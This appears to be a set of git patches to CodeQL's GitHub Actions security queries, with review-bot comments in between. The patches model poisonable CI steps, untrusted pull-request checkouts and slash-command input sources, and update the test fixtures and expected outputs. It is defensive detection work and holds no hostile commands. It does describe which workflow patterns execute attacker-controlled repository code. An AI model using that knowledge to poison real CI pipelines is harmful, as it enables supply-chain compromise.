-| .github/workflows/poisonable_steps.yml:1:1:23:93 | exit on: push |
-| .github/workflows/poisonable_steps.yml:1:1:23:93 | exit on: push (normal) |
-| .github/workflows/poisonable_steps.yml:1:1:23:93 | on: push |
-| .github/workflows/poisonable_steps.yml:5:5:23:93 | Job: local_commands |
+| .github/workflows/poisonable_steps.yml:1:1:24:43 | enter on: push |
+| .github/workflows/poisonable_steps.yml:1:1:24:43 | exit on: push |
+| .github/workflows/poisonable_steps.yml:1:1:24:43 | exit on: push (normal) |
+| .github/workflows/poisonable_steps.yml:1:1:24:43 | on: push |
+| .github/workflows/poisonable_steps.yml:5:5:24:43 | Job: local_commands |
 | .github/workflows/poisonable_steps.yml:7:9:8:6 | Run Step |
 | .github/workflows/poisonable_steps.yml:7:14:7:30 | venv/bin/activate |
 | .github/workflows/poisonable_steps.yml:8:9:9:6 | Run Step |
@@ -606,8 +613,10 @@ cfgNodes | .github/workflows/poisonable_steps.yml:21:14:21:78 | python scripts/generate_theme.py --outfile js/storybook/theme.css | | .github/workflows/poisonable_steps.yml:22:9:23:6 | Run Step | | .github/workflows/poisonable_steps.yml:22:14:22:76 | ruby scripts/generate_theme.rb --outfile js/storybook/theme.css | -| .github/workflows/poisonable_steps.yml:23:9:23:93 | Run Step | +| .github/workflows/poisonable_steps.yml:23:9:24:6 | Run Step | | .github/workflows/poisonable_steps.yml:23:14:23:92 | bundle run exec ruby scripts/generate_theme.rb --outfile js/storybook/theme.css | +| .github/workflows/poisonable_steps.yml:24:9:24:43 | Run Step | +| .github/workflows/poisonable_steps.yml:24:14:24:42 | xvfb-run ./mvnw clean package | | .github/workflows/test.yml:1:1:40:53 | enter on: push | | .github/workflows/test.yml:1:1:40:53 | exit on: push | | .github/workflows/test.yml:1:1:40:53 | exit on: push (normal) | @@ -686,7 +695,7 @@ dfNodes | .github/workflows/multiline.yml:79:14:84:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | | .github/workflows/multiline.yml:85:9:89:29 | Run Step | | .github/workflows/multiline.yml:86:14:89:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | -| .github/workflows/poisonable_steps.yml:5:5:23:93 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:5:5:24:43 | Job: local_commands | | .github/workflows/poisonable_steps.yml:7:9:8:6 | Run Step | | .github/workflows/poisonable_steps.yml:7:14:7:30 | venv/bin/activate | | .github/workflows/poisonable_steps.yml:8:9:9:6 | Run Step | 
@@ -719,8 +728,10 @@ dfNodes | .github/workflows/poisonable_steps.yml:21:14:21:78 | python scripts/generate_theme.py --outfile js/storybook/theme.css | | .github/workflows/poisonable_steps.yml:22:9:23:6 | Run Step | | .github/workflows/poisonable_steps.yml:22:14:22:76 | ruby scripts/generate_theme.rb --outfile js/storybook/theme.css | -| .github/workflows/poisonable_steps.yml:23:9:23:93 | Run Step | +| .github/workflows/poisonable_steps.yml:23:9:24:6 | Run Step | | .github/workflows/poisonable_steps.yml:23:14:23:92 | bundle run exec ruby scripts/generate_theme.rb --outfile js/storybook/theme.css | +| .github/workflows/poisonable_steps.yml:24:9:24:43 | Run Step | +| .github/workflows/poisonable_steps.yml:24:14:24:42 | xvfb-run ./mvnw clean package | | .github/workflows/test.yml:5:5:31:2 | Job: job1 | | .github/workflows/test.yml:8:7:10:4 | Job outputs node | | .github/workflows/test.yml:8:20:8:50 | steps.step.outputs.value | 
@@ -800,7 +811,7 @@ nodeLocations | .github/workflows/multiline.yml:79:14:84:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | .github/workflows/multiline.yml:79:14:84:29 | .github/workflows/multiline.yml@79:14:84:29 | | .github/workflows/multiline.yml:85:9:89:29 | Run Step | .github/workflows/multiline.yml:85:9:89:29 | .github/workflows/multiline.yml@85:9:89:29 | | .github/workflows/multiline.yml:86:14:89:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | .github/workflows/multiline.yml:86:14:89:29 | .github/workflows/multiline.yml@86:14:89:29 | -| .github/workflows/poisonable_steps.yml:5:5:23:93 | Job: local_commands | .github/workflows/poisonable_steps.yml:5:5:23:93 | .github/workflows/poisonable_steps.yml@5:5:23:93 | +| .github/workflows/poisonable_steps.yml:5:5:24:43 | Job: local_commands | .github/workflows/poisonable_steps.yml:5:5:24:43 | .github/workflows/poisonable_steps.yml@5:5:24:43 | | .github/workflows/poisonable_steps.yml:7:9:8:6 | Run Step | .github/workflows/poisonable_steps.yml:7:9:8:6 | .github/workflows/poisonable_steps.yml@7:9:8:6 | | .github/workflows/poisonable_steps.yml:7:14:7:30 | venv/bin/activate | .github/workflows/poisonable_steps.yml:7:14:7:30 | .github/workflows/poisonable_steps.yml@7:14:7:30 | | .github/workflows/poisonable_steps.yml:8:9:9:6 | Run Step | .github/workflows/poisonable_steps.yml:8:9:9:6 | .github/workflows/poisonable_steps.yml@8:9:9:6 | 
@@ -833,8 +844,10 @@ nodeLocations | .github/workflows/poisonable_steps.yml:21:14:21:78 | python scripts/generate_theme.py --outfile js/storybook/theme.css | .github/workflows/poisonable_steps.yml:21:14:21:78 | .github/workflows/poisonable_steps.yml@21:14:21:78 | | .github/workflows/poisonable_steps.yml:22:9:23:6 | Run Step | .github/workflows/poisonable_steps.yml:22:9:23:6 | .github/workflows/poisonable_steps.yml@22:9:23:6 | | .github/workflows/poisonable_steps.yml:22:14:22:76 | ruby scripts/generate_theme.rb --outfile js/storybook/theme.css | .github/workflows/poisonable_steps.yml:22:14:22:76 | .github/workflows/poisonable_steps.yml@22:14:22:76 | -| .github/workflows/poisonable_steps.yml:23:9:23:93 | Run Step | .github/workflows/poisonable_steps.yml:23:9:23:93 | .github/workflows/poisonable_steps.yml@23:9:23:93 | +| .github/workflows/poisonable_steps.yml:23:9:24:6 | Run Step | .github/workflows/poisonable_steps.yml:23:9:24:6 | .github/workflows/poisonable_steps.yml@23:9:24:6 | | .github/workflows/poisonable_steps.yml:23:14:23:92 | bundle run exec ruby scripts/generate_theme.rb --outfile js/storybook/theme.css | .github/workflows/poisonable_steps.yml:23:14:23:92 | .github/workflows/poisonable_steps.yml@23:14:23:92 | +| .github/workflows/poisonable_steps.yml:24:9:24:43 | Run Step | .github/workflows/poisonable_steps.yml:24:9:24:43 | .github/workflows/poisonable_steps.yml@24:9:24:43 | +| .github/workflows/poisonable_steps.yml:24:14:24:42 | xvfb-run ./mvnw clean package | .github/workflows/poisonable_steps.yml:24:14:24:42 | .github/workflows/poisonable_steps.yml@24:14:24:42 | | .github/workflows/test.yml:5:5:31:2 | Job: job1 | .github/workflows/test.yml:5:5:31:2 | .github/workflows/test.yml@5:5:31:2 | | .github/workflows/test.yml:8:7:10:4 | Job outputs node | .github/workflows/test.yml:8:7:10:4 | .github/workflows/test.yml@8:7:10:4 | | .github/workflows/test.yml:8:20:8:50 | steps.step.outputs.value | .github/workflows/test.yml:8:20:8:50 | 
.github/workflows/test.yml@8:20:8:50 |
@@ -855,7 +868,7 @@ nodeLocations
 scopes
 | .github/workflows/expression_nodes.yml:1:1:21:47 | on: issue_comment |
 | .github/workflows/multiline.yml:1:1:89:29 | on: |
-| .github/workflows/poisonable_steps.yml:1:1:23:93 | on: push |
+| .github/workflows/poisonable_steps.yml:1:1:24:43 | on: push |
 | .github/workflows/test.yml:1:1:40:53 | on: push |
 sources
 | ahmadnassri/action-changed-files | * | output.files | filename | manual |
From 20ce5d5344c2c7b6ff441b4295397e41e0b75723 Mon Sep 17 00:00:00 2001
From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?=
Date: Mon, 8 Jul 2024 12:59:16 +0200
Subject: [PATCH 381/707] Add JS local imports as Poisonable steps
---
 ql/lib/codeql/actions/security/PoisonableSteps.qll | 12 ++++++++++++
 .../.github/workflows/poisonable_steps.yml | 5 +++++
 ql/test/library-tests/poisonable_steps.expected | 13 +++++++------
 3 files changed, 24 insertions(+), 6 deletions(-)
diff --git a/ql/lib/codeql/actions/security/PoisonableSteps.qll b/ql/lib/codeql/actions/security/PoisonableSteps.qll
index b0c6f7aa6a9d..e22662c64db3 100644
--- a/ql/lib/codeql/actions/security/PoisonableSteps.qll
+++ b/ql/lib/codeql/actions/security/PoisonableSteps.qll
@@ -23,6 +23,18 @@ class PoisonableCommandStep extends PoisonableStep, Run {
 }
 }
+class JavascriptImportnUsesStep extends PoisonableStep, UsesStep {
+ JavascriptImportnUsesStep() {
+ exists(string script, string line, string import_stmt |
+ this.getCallee() = "actions/github-script" and
+ script = this.getArgument("script") and
+ line = script.splitAt("\n").trim() and
+ import_stmt = line.regexpCapture(".*await\\s+import\\((.*)\\).*", 1) and
+ import_stmt.regexpMatch(".*\\bgithub.workspace\\b.*")
+ )
+ }
+}
+
 class LocalScriptExecutionRunStep extends PoisonableStep, Run {
 string cmd;
diff --git a/ql/test/library-tests/.github/workflows/poisonable_steps.yml b/ql/test/library-tests/.github/workflows/poisonable_steps.yml
index 608b3d5a09f8..7be32ca5c17a 100644
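Review bot: `JavascriptImportnUsesStep` only fires on `await import(...)`, so a github-script step that loads a workspace file with `require('${{ github.workspace }}/x.js')`, or with an `import(...)` that is not awaited on the same line, is not classified as poisonable although it executes repository-controlled code just the same; widening the capture to `line.regexpCapture(".*\\b(?:import|require)\\s*\\((.*)\\).*", 1)` covers both forms while keeping the `github.workspace` check, and a path built from `process.env.GITHUB_WORKSPACE` would still be missed. The class name looks like a typo (`Importn`); `JavascriptImportUsesStep` would be consistent with `LocalScriptExecutionRunStep` below. A QLDoc comment is also missing; `/** A github-script step that dynamically imports a module from the checked-out workspace. */` above the class would state the intent.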
--- a/ql/test/library-tests/.github/workflows/poisonable_steps.yml
+++ b/ql/test/library-tests/.github/workflows/poisonable_steps.yml
@@ -5,6 +5,11 @@ jobs:
 runs-on: ubuntu-latest
 steps:
 - run: venv/bin/activate # not supported yet
+ - uses: actions/github-script@v7
+ with:
+ script: |
+ const { default: foo } = await import('${{ github.workspace }}/scripts/foo.mjs')
+ return foo({ github, context, core }, body, number, sender)
 - run: . venv/bin/activate
 - run: echo foo; . venv/bin/activate
 - run: echo foo;. venv/bin/activate
diff --git a/ql/test/library-tests/poisonable_steps.expected b/ql/test/library-tests/poisonable_steps.expected
index 52f38506f09d..dc6b863d0b93 100644
--- a/ql/test/library-tests/poisonable_steps.expected
+++ b/ql/test/library-tests/poisonable_steps.expected
@@ -1,10 +1,6 @@
 | .github/workflows/multiline.yml:24:9:30:6 | Run Step |
 | .github/workflows/multiline.yml:63:9:66:6 | Run Step |
-| .github/workflows/poisonable_steps.yml:8:9:9:6 | Run Step |
-| .github/workflows/poisonable_steps.yml:9:9:10:6 | Run Step |
-| .github/workflows/poisonable_steps.yml:10:9:11:6 | Run Step |
-| .github/workflows/poisonable_steps.yml:11:9:12:6 | Run Step |
-| .github/workflows/poisonable_steps.yml:12:9:13:6 | Run Step |
+| .github/workflows/poisonable_steps.yml:8:9:13:6 | Uses Step |
 | .github/workflows/poisonable_steps.yml:13:9:14:6 | Run Step |
 | .github/workflows/poisonable_steps.yml:14:9:15:6 | Run Step |
 | .github/workflows/poisonable_steps.yml:15:9:16:6 | Run Step |
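Review bot: The new fixture only exercises the positive case of `JavascriptImportnUsesStep`; a second `actions/github-script` step whose `await import(...)` does not reference `github.workspace` (for example a bare package name) would pin down that the class does not flag every dynamic import, and the expected output would then document both outcomes. The `steps` list continues outside the hunk.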
@@ -16,4 +12,9 @@
 | .github/workflows/poisonable_steps.yml:21:9:22:6 | Run Step |
 | .github/workflows/poisonable_steps.yml:22:9:23:6 | Run Step |
 | .github/workflows/poisonable_steps.yml:23:9:24:6 | Run Step |
-| .github/workflows/poisonable_steps.yml:24:9:24:43 | Run Step |
+| .github/workflows/poisonable_steps.yml:24:9:25:6 | Run Step |
+| .github/workflows/poisonable_steps.yml:25:9:26:6 | Run Step |
+| .github/workflows/poisonable_steps.yml:26:9:27:6 | Run Step |
+| .github/workflows/poisonable_steps.yml:27:9:28:6 | Run Step |
+| .github/workflows/poisonable_steps.yml:28:9:29:6 | Run Step |
+| .github/workflows/poisonable_steps.yml:29:9:29:43 | Run Step |
From 1657af60dfb3debdb0cd8066d7927f29487e969d Mon Sep 17 00:00:00 2001
From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?=
Date: Mon, 8 Jul 2024 12:59:36 +0200
Subject: [PATCH 382/707] Model get-workflow-origin action
---
 .../security/UntrustedCheckoutQuery.qll | 26 +++++++++++++------
 .../potiuk_get-workflow-origin.model.yml | 6 +++++
 2 files changed, 24 insertions(+), 8 deletions(-)
 create mode 100644 ql/lib/ext/manual/potiuk_get-workflow-origin.model.yml
diff --git a/ql/lib/codeql/actions/security/UntrustedCheckoutQuery.qll b/ql/lib/codeql/actions/security/UntrustedCheckoutQuery.qll
index 8187bca9f049..a0bf48f9beb8 100644
--- a/ql/lib/codeql/actions/security/UntrustedCheckoutQuery.qll
+++ b/ql/lib/codeql/actions/security/UntrustedCheckoutQuery.qll
@@ -99,9 +99,13 @@ class ActionsMutableRefCheckout extends MutableRefCheckoutStep instanceof UsesSt
 "alessbell/pull-request-comment-branch", "gotson/pull-request-comment-branch"
 ] and
 // TODO: This should be read step of the head_sha or head_ref output vars
- this.getArgument("ref").matches("%.head_ref%")
+ this.getArgument("ref").regexpMatch(".*(head_ref).*")
 or
- step.getCallee() = ["github/branch-deploy"] and
+ step.getCallee() = "potiuk/get-workflow-origin" and
+ // TODO: This should be read step of the ref output var
+ this.getArgument("ref").matches("%." + ["sourceHeadBranch", "pullRequestNumber"])
+ or
+ step.getCallee() = "github/branch-deploy" and
 // TODO: This should be read step of the ref output var
 this.getArgument("ref").matches("%.ref%")
 ) and
@@ -149,12 +153,18 @@ class ActionsSHACheckout extends SHACheckoutStep instanceof UsesStep {
 or
 // 3rd party actions returning the PR head sha/ref
 exists(UsesStep step |
- step.getCallee() =
- [
- "eficode/resolve-pr-refs", "xt0rted/pull-request-comment-branch",
- "alessbell/pull-request-comment-branch", "gotson/pull-request-comment-branch"
- ] and
- this.getArgument("ref").regexpMatch(".*head_sha.*") and
+ (
+ step.getCallee() =
+ [
+ "eficode/resolve-pr-refs", "xt0rted/pull-request-comment-branch",
+ "alessbell/pull-request-comment-branch", "gotson/pull-request-comment-branch"
+ ] and
+ this.getArgument("ref").regexpMatch(".*(head_sha).*")
+ or
+ step.getCallee() = "potiuk/get-workflow-origin" and
+ // TODO: This should be read step of the ref output var
+ this.getArgument("ref").matches("%." + ["sourceHeadSha", "mergeCommitSha"])
+ ) and
 DataFlow::hasLocalFlowExpr(step, this.getArgumentExpr("ref"))
 )
 or
diff --git a/ql/lib/ext/manual/potiuk_get-workflow-origin.model.yml b/ql/lib/ext/manual/potiuk_get-workflow-origin.model.yml
new file mode 100644
index 000000000000..0acee71af263
--- /dev/null
+++ b/ql/lib/ext/manual/potiuk_get-workflow-origin.model.yml
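Review bot: `matches("%." + ["sourceHeadBranch", "pullRequestNumber"])` has no trailing `%`, unlike the neighbouring `matches("%.ref%")`, so it only holds when the `ref` argument ends exactly with the output name; a checkout by PR number is normally written as `refs/pull/${{ steps.x.outputs.pullRequestNumber }}/merge`, and if `getArgument` returns the raw expression text the value also ends in ` }}`, so in both cases the new `potiuk/get-workflow-origin` branch presumably never matches. Mirroring the existing pattern with `this.getArgument("ref").matches("%." + ["sourceHeadBranch", "pullRequestNumber"] + "%")` fixes it, and the same applies to the `sourceHeadSha`/`mergeCommitSha` branch added in the second hunk of this file. Both enclosing class bodies start outside their hunks.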
@@ -0,0 +1,6 @@
+extensions:
+ - addsTo:
+ pack: github/actions-all
+ extensible: actionsSourceModel
+ data:
+ - ["potiuk/get-workflow-origin", "*", "output.sourceHeadBranch", "branch", "manual"]
From a2af3c654b59ae2a434d710b77aae82d01fdae5a Mon Sep 17 00:00:00 2001
From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?=
Date: Mon, 8 Jul 2024 20:46:29 +0200
Subject: [PATCH 383/707] Account for all npm and pnpm subcommands
Exclude args such as `npm -v`
---
 ql/lib/ext/config/poisonable_steps.yml | 8 ++------
 1 file changed, 2 insertions(+), 6 deletions(-)
diff --git a/ql/lib/ext/config/poisonable_steps.yml b/ql/lib/ext/config/poisonable_steps.yml
index ff3df1f699c6..56ba567aa455 100644
--- a/ql/lib/ext/config/poisonable_steps.yml
+++ b/ql/lib/ext/config/poisonable_steps.yml
@@ -32,12 +32,8 @@ extensions:
 - ["msbuild"]
 - ["mvn"]
 - ["mypy"]
- - ["npm i(nstall)?"]
- - ["npm run"]
- - ["npm ci"]
- - ["pnpm i(nstall)?"]
- - ["pnpm run"]
- - ["pnpm ci"]
+ - ["npm [a-z]"]
+ - ["pnpm [a-z]"]
 - ["pre-commit"]
 - ["prettier"]
 - ["pip install -r"]
From ee265c48796441149bf579b81237eaf5359bbebb Mon Sep 17 00:00:00 2001
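Review bot: Only `output.sourceHeadBranch` is modelled as a source here, while the `UntrustedCheckoutQuery.qll` hunks in this commit also key on the `pullRequestNumber`, `sourceHeadSha` and `mergeCommitSha` outputs of the same action; if those outputs are meant to reach the checkout `ref` through `DataFlow::hasLocalFlowExpr`, they presumably need rows as well, e.g. `- ["potiuk/get-workflow-origin", "*", "output.sourceHeadSha", "text", "manual"]` (or whichever source type the pack uses for SHAs). If leaving them out is deliberate, a one-line comment recording why only the branch name is modelled would save the next reader the question.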
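Review bot: `npm [a-z]` and `pnpm [a-z]` now match every lowercase subcommand, so read-only invocations such as `npm ls`, `npm view` or `npm whoami`, which run nothing from the checked-out repository, are flagged as poisonable alongside `npm install`, `npm ci` and `npm run`; this is the trade-off the commit makes to drop `npm -v`, and it deserves a comment saying so. If precision matters, an explicit list of the script-running subcommands, e.g. `- ["npm (i|install|ci|run|test|start|pack|publish|rebuild|version)"]`, keeps the entry self-describing, assuming these entries are regular expressions as the removed `npm i(nstall)?` suggests. The pattern list continues outside the hunk.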
From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?=
Date: Mon, 8 Jul 2024 22:38:53 +0200
Subject: [PATCH 384/707] fix(models): Slash-command-action
Do not consider slash-command-action command-arguments as a remote flow source if it requires write or admin permissions
---
 .../codeql/actions/dataflow/FlowSources.qll | 12 +
 ql/lib/codeql/actions/dataflow/FlowSteps.qll | 18 +-
 .../xt0rted_slash-command-action.model.yml | 7 -
 ql/test/library-tests/test.expected | 414 +++++++++---------
 .../.github/workflows/slash_command1.yml | 21 +
 .../.github/workflows/slash_command2.yml | 21 +
 .../CWE-094/CodeInjectionCritical.expected | 4 +
 .../CWE-094/CodeInjectionMedium.expected | 3 +
 8 files changed, 294 insertions(+), 206 deletions(-)
 delete mode 100644 ql/lib/ext/manual/xt0rted_slash-command-action.model.yml
 create mode 100644 ql/test/query-tests/Security/CWE-094/.github/workflows/slash_command1.yml
 create mode 100644 ql/test/query-tests/Security/CWE-094/.github/workflows/slash_command2.yml
diff --git a/ql/lib/codeql/actions/dataflow/FlowSources.qll b/ql/lib/codeql/actions/dataflow/FlowSources.qll
index 79934ca586bf..34f8c76df67d 100644
--- a/ql/lib/codeql/actions/dataflow/FlowSources.qll
+++ b/ql/lib/codeql/actions/dataflow/FlowSources.qll
@@ -222,3 +222,15 @@ class TJActionsVerifyChangedFilesSource extends RemoteFlowSource {
 override string getSourceType() { result = "filename" }
 }
+
+class Xt0rtedSlashCommandSource extends RemoteFlowSource {
+ Xt0rtedSlashCommandSource() {
+ exists(UsesStep u |
+ u.getCallee() = "xt0rted/slash-command-action" and
+ u.getArgument("permission-level").toLowerCase() = ["read", "none"] and
+ this.asExpr() = u
+ )
+ }
+
+ override string getSourceType() { result = "text" }
+}
diff --git a/ql/lib/codeql/actions/dataflow/FlowSteps.qll b/ql/lib/codeql/actions/dataflow/FlowSteps.qll
index caa09e9c7e28..46c42da26521 100644
--- a/ql/lib/codeql/actions/dataflow/FlowSteps.qll
+++ b/ql/lib/codeql/actions/dataflow/FlowSteps.qll
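Review bot: `Xt0rtedSlashCommandSource` only matches when `permission-level` is explicitly set to `read` or `none`, so a step that omits the input is never a source; that is correct only if the action's default permission level is `write` or `admin`, which nothing in the hunk establishes — confirm against the action's metadata and, if the default is lower, change the condition to `(u.getArgument("permission-level").toLowerCase() = ["read", "none"] or not exists(u.getArgument("permission-level")))`. The class also lacks a QLDoc comment; `/** A xt0rted/slash-command-action step whose command-arguments may be set by any user with read or no repository permission, i.e. a remote source. */` would record the gating rule that only the commit message explains.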
@@ -217,7 +217,7 @@ predicate tjActionsChangedFilesTaintStep(DataFlow::Node pred, DataFlow::Node suc
 */
 predicate tjActionsVerifyChangedFilesTaintStep(DataFlow::Node pred, DataFlow::Node succ) {
 exists(StepsExpression o |
- pred instanceof TJActionsChangedFilesSource and
+ pred instanceof TJActionsVerifyChangedFilesSource and
 o.getTarget() = pred.asExpr() and
 o.getStepId() = pred.asExpr().(UsesStep).getId() and
 o.getFieldName() = "changed_files" and
@@ -225,12 +225,26 @@ predicate tjActionsVerifyChangedFilesTaintStep(DataFlow::Node pred, DataFlow::No
 )
 }
+/**
+ * A read of user-controlled field of the xt0rted/slash-command-action action.
+ */
+predicate xt0rtedSlashCommandActionTaintStep(DataFlow::Node pred, DataFlow::Node succ) {
+ exists(StepsExpression o |
+ pred instanceof Xt0rtedSlashCommandSource and
+ o.getTarget() = pred.asExpr() and
+ o.getStepId() = pred.asExpr().(UsesStep).getId() and
+ o.getFieldName() = "command-arguments" and
+ succ.asExpr() = o
+ )
+}
+
 class TaintSteps extends AdditionalTaintStep {
 override predicate step(DataFlow::Node node1, DataFlow::Node node2) {
 envToRunStep(node1, node2) or
 artifactDownloadToUseStep(node1, node2) or
 dornyPathsFilterTaintStep(node1, node2) or
 tjActionsChangedFilesTaintStep(node1, node2) or
- tjActionsVerifyChangedFilesTaintStep(node1, node2)
+ tjActionsVerifyChangedFilesTaintStep(node1, node2) or
+ xt0rtedSlashCommandActionTaintStep(node1, node2)
 }
 }
diff --git a/ql/lib/ext/manual/xt0rted_slash-command-action.model.yml b/ql/lib/ext/manual/xt0rted_slash-command-action.model.yml
deleted file mode 100644
index 0910261d21d6..000000000000
--- a/ql/lib/ext/manual/xt0rted_slash-command-action.model.yml
+++ /dev/null
@@ -1,7 +0,0 @@
-extensions:
- - addsTo:
- pack: github/actions-all
- extensible: actionsSourceModel
- data:
- - ["xt0rted/slash-command-action", "*", "output.command-arguments", "text", "manual"]
- - ["xt0rted/slash-command-action", "*", "output.command-arguments", "text", "manual"]
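Review bot: The QLDoc on `xt0rtedSlashCommandActionTaintStep` is ungrammatical and does not name the output it propagates; `* A read of the user-controlled command-arguments output of the xt0rted/slash-command-action action.` says what the predicate actually checks. The predicate is also another copy of the `StepsExpression` shape visible in `tjActionsVerifyChangedFilesTaintStep` in the first hunk (target, step id, field name, successor); a shared helper such as `predicate stepOutputRead(DataFlow::Node pred, DataFlow::Node succ, string field)` would let each action-specific step reduce to an `instanceof` test plus a field name. `TaintSteps` and the new predicate are complete within the second hunk, while the first hunk's `tjActionsVerifyChangedFilesTaintStep` body continues outside it.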
diff --git a/ql/test/library-tests/test.expected b/ql/test/library-tests/test.expected index 19eda82df481..c80dc006ce7a 100644 --- a/ql/test/library-tests/test.expected +++ b/ql/test/library-tests/test.expected @@ -6,20 +6,20 @@ files workflows | .github/workflows/expression_nodes.yml:1:1:21:47 | on: issue_comment | | .github/workflows/multiline.yml:1:1:89:29 | on: | -| .github/workflows/poisonable_steps.yml:1:1:24:43 | on: push | +| .github/workflows/poisonable_steps.yml:1:1:29:43 | on: push | | .github/workflows/test.yml:1:1:40:53 | on: push | reusableWorkflows compositeActions jobs | .github/workflows/expression_nodes.yml:5:5:21:47 | Job: echo-chamber | | .github/workflows/multiline.yml:9:5:89:29 | Job: Test | -| .github/workflows/poisonable_steps.yml:5:5:24:43 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:5:5:29:43 | Job: local_commands | | .github/workflows/test.yml:5:5:31:2 | Job: job1 | | .github/workflows/test.yml:32:5:40:53 | Job: job2 | localJobs | .github/workflows/expression_nodes.yml:5:5:21:47 | Job: echo-chamber | | .github/workflows/multiline.yml:9:5:89:29 | Job: Test | -| .github/workflows/poisonable_steps.yml:5:5:24:43 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:5:5:29:43 | Job: local_commands | | .github/workflows/test.yml:5:5:31:2 | Job: job1 | | .github/workflows/test.yml:32:5:40:53 | Job: job2 | extJobs 
@@ -46,11 +46,7 @@ steps | .github/workflows/multiline.yml:78:9:85:6 | Run Step | | .github/workflows/multiline.yml:85:9:89:29 | Run Step | | .github/workflows/poisonable_steps.yml:7:9:8:6 | Run Step | -| .github/workflows/poisonable_steps.yml:8:9:9:6 | Run Step | -| .github/workflows/poisonable_steps.yml:9:9:10:6 | Run Step | -| .github/workflows/poisonable_steps.yml:10:9:11:6 | Run Step | -| .github/workflows/poisonable_steps.yml:11:9:12:6 | Run Step | -| .github/workflows/poisonable_steps.yml:12:9:13:6 | Run Step | +| .github/workflows/poisonable_steps.yml:8:9:13:6 | Uses Step | | .github/workflows/poisonable_steps.yml:13:9:14:6 | Run Step | | .github/workflows/poisonable_steps.yml:14:9:15:6 | Run Step | | .github/workflows/poisonable_steps.yml:15:9:16:6 | Run Step | @@ -62,7 +58,12 @@ steps | .github/workflows/poisonable_steps.yml:21:9:22:6 | Run Step | | .github/workflows/poisonable_steps.yml:22:9:23:6 | Run Step | | .github/workflows/poisonable_steps.yml:23:9:24:6 | Run Step | -| .github/workflows/poisonable_steps.yml:24:9:24:43 | Run Step | +| .github/workflows/poisonable_steps.yml:24:9:25:6 | Run Step | +| .github/workflows/poisonable_steps.yml:25:9:26:6 | Run Step | +| .github/workflows/poisonable_steps.yml:26:9:27:6 | Run Step | +| .github/workflows/poisonable_steps.yml:27:9:28:6 | Run Step | +| .github/workflows/poisonable_steps.yml:28:9:29:6 | Run Step | +| .github/workflows/poisonable_steps.yml:29:9:29:43 | Run Step | | .github/workflows/test.yml:11:9:15:6 | Uses Step | | .github/workflows/test.yml:15:9:19:6 | Uses Step: source | | .github/workflows/test.yml:19:9:26:6 | Uses Step: step | 
@@ -92,23 +93,23 @@ runSteps | .github/workflows/multiline.yml:78:9:85:6 | Run Step | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | | .github/workflows/multiline.yml:85:9:89:29 | Run Step | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | | .github/workflows/poisonable_steps.yml:7:9:8:6 | Run Step | venv/bin/activate | -| .github/workflows/poisonable_steps.yml:8:9:9:6 | Run Step | . venv/bin/activate | -| .github/workflows/poisonable_steps.yml:9:9:10:6 | Run Step | echo foo; . venv/bin/activate | -| .github/workflows/poisonable_steps.yml:10:9:11:6 | Run Step | echo foo;. venv/bin/activate | -| .github/workflows/poisonable_steps.yml:11:9:12:6 | Run Step | echo foo \|. venv/bin/activate | -| .github/workflows/poisonable_steps.yml:12:9:13:6 | Run Step | ./venv/bin/activate | -| .github/workflows/poisonable_steps.yml:13:9:14:6 | Run Step | sh venv/bin/activate.sh | -| .github/workflows/poisonable_steps.yml:14:9:15:6 | Run Step | echo $(sh venv/bin/activate.sh) | -| .github/workflows/poisonable_steps.yml:15:9:16:6 | Run Step | echo foo; sh venv/bin/activate.sh; echo bar | -| .github/workflows/poisonable_steps.yml:16:9:17:6 | Run Step | echo foo \| sh venv/bin/activate.sh > output | -| .github/workflows/poisonable_steps.yml:17:9:18:6 | Run Step | python venv/bin/activate.py | -| .github/workflows/poisonable_steps.yml:18:9:19:6 | Run Step | echo foo; python venv/bin/activate.py | -| .github/workflows/poisonable_steps.yml:19:9:20:6 | Run Step | pnpm run test:ct | -| .github/workflows/poisonable_steps.yml:20:9:21:6 | Run Step | pip install nbformat && python scripts/generate_notebooks.py | -| .github/workflows/poisonable_steps.yml:21:9:22:6 | Run Step | python scripts/generate_theme.py --outfile js/storybook/theme.css | -| .github/workflows/poisonable_steps.yml:22:9:23:6 | Run Step | ruby scripts/generate_theme.rb --outfile js/storybook/theme.css | -| .github/workflows/poisonable_steps.yml:23:9:24:6 | Run Step | bundle run exec ruby scripts/generate_theme.rb --outfile 
js/storybook/theme.css | -| .github/workflows/poisonable_steps.yml:24:9:24:43 | Run Step | xvfb-run ./mvnw clean package | +| .github/workflows/poisonable_steps.yml:13:9:14:6 | Run Step | . venv/bin/activate | +| .github/workflows/poisonable_steps.yml:14:9:15:6 | Run Step | echo foo; . venv/bin/activate | +| .github/workflows/poisonable_steps.yml:15:9:16:6 | Run Step | echo foo;. venv/bin/activate | +| .github/workflows/poisonable_steps.yml:16:9:17:6 | Run Step | echo foo \|. venv/bin/activate | +| .github/workflows/poisonable_steps.yml:17:9:18:6 | Run Step | ./venv/bin/activate | +| .github/workflows/poisonable_steps.yml:18:9:19:6 | Run Step | sh venv/bin/activate.sh | +| .github/workflows/poisonable_steps.yml:19:9:20:6 | Run Step | echo $(sh venv/bin/activate.sh) | +| .github/workflows/poisonable_steps.yml:20:9:21:6 | Run Step | echo foo; sh venv/bin/activate.sh; echo bar | +| .github/workflows/poisonable_steps.yml:21:9:22:6 | Run Step | echo foo \| sh venv/bin/activate.sh > output | +| .github/workflows/poisonable_steps.yml:22:9:23:6 | Run Step | python venv/bin/activate.py | +| .github/workflows/poisonable_steps.yml:23:9:24:6 | Run Step | echo foo; python venv/bin/activate.py | +| .github/workflows/poisonable_steps.yml:24:9:25:6 | Run Step | pnpm run test:ct | +| .github/workflows/poisonable_steps.yml:25:9:26:6 | Run Step | pip install nbformat && python scripts/generate_notebooks.py | +| .github/workflows/poisonable_steps.yml:26:9:27:6 | Run Step | python scripts/generate_theme.py --outfile js/storybook/theme.css | +| .github/workflows/poisonable_steps.yml:27:9:28:6 | Run Step | ruby 